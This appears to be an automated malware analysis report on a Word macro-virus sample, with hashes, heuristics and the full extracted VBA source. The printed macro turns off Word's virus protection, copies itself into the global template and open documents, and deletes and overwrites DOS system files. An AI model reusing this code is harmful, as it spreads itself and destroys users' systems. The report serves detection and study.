Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 868a1be3c002bb7a…

MALICIOUS

Office (OLE) / .DOC

Size: 30.5 KB
Created: 1997-01-31 16:17:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5cec6b68c0a6144e8475f8b5839c9610
SHA-1: 7d3db1afe331448cb9baa78d928bfc6c85d1aab0
SHA-256: 868a1be3c002bb7a02451cfc5d2d0ec46d350a349b989e0b1fca8f0dcf76ec51
Risk Score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. Critical heuristics indicate self-replication and disabling of macro protection, suggesting the macro is designed to spread and to evade detection. The macro attempts to disable Word's built-in virus protection by setting `Options.VirusProtection = False`. It also references a local file path `C:\_vir\rep-Hrn.doc`, which may be related to its replication or payload delivery.

Heuristics (2)

  • VBA macros detected (severity: medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA macro-virus self-replication / AV tampering (severity: critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script: .VirusProtection = False

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3239 bytes
SHA-256: 71e8da40a9c25fa3236472d1ca3f41e760cae4e6f69d72531ef5b836049fd216

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub Docclose()
Attribute Docclose.VB_Description = "Ìàêðîñ çàïèñàí 05/15/99 viktork"
Attribute Docclose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Ìàêðîñ1"
On Error Resume Next
    Application.DisplayStatusBar = True
    With ActiveWindow
        .DisplayHorizontalScrollBar = True
        .DisplayVerticalScrollBar = True
        .StyleAreaWidth = CentimetersToPoints(0)
        .DisplayScreenTips = True
        With .View
            .ShowAnimation = True
            .Draft = False
            .WrapToWindow = False
            .ShowPicturePlaceHolders = False
            .ShowFieldCodes = False
            .ShowBookmarks = False
            .FieldShading = wdFieldShadingWhenSelected
            .ShowTabs = False
            .ShowSpaces = False
            .ShowParagraphs = False
            .ShowHyphens = False
            .ShowHiddenText = False
            .ShowAll = False
            .ShowHighlight = True
        End With
    End With
    With Options
        .Pagination = True
        .WPHelp = False
        .WPDocNavKeys = False
        .ShortMenuNames = False
        .RTFInClipboard = True
        .BlueScreen = False
        .EnableSound = False
        .ConfirmConversions = True
        .UpdateLinksAtOpen = True
        .SendMailAttach = True
        .MeasurementUnit = wdCentimeters
        .AnimateScreenMovements = True
        .VirusProtection = False
    End With
    Application.DisplayRecentFiles = True
    RecentFiles.Maximum = 4
    
'Append [the module] if it is not in Normal
     '   Application.OrganizerDelete Normal.ThisDocument.FullName, "NewMacros", wdOrganizerObjectProjectItems
        
        Application.OrganizerCopy Source:= _
        ActiveDocument.FullName, Destination:= _
        Normal.ThisDocument.FullName, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems

'Append [the module] if it is not in the document but is in Normal
     '   Application.OrganizerDelete ActiveDocument.FullName, "NewMacros", wdOrganizerObjectProjectItems

        Application.OrganizerCopy Source:= _
        Normal.ThisDocument.FullName, Destination:= _
        ActiveDocument.FullName, Name:="NewMAcros", Object:=wdOrganizerObjectProjectItems
'Do the nasty stuff
Kill "c:\command.com"
Kill "c:\config.sys"
Kill "c:\autoexec.bat"
Kill "c:\io.sys"
Kill "c:\msdos.sys"

Open "c:\command.com" For Output As #1
    Print #1, "Â æîïó íå åáàòüñÿ, ñäåëàþ õåðíþ !!!"
Close #1
ActiveDocument.Save
Normal.ThisDocument.Save
ActiveDocument.Close
End Sub
Sub DelRow()
Attribute DelRow.VB_Description = "Ìàêðîñ çàïèñàí 20.07.00 OrChiD"
Attribute DelRow.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.DelRow"
'
' DelRow Macro
' Macro recorded 20.07.00 OrChiD
'
    Selection.Cells.Delete ShiftCells:=wdDeleteCellsEntireRow
End Sub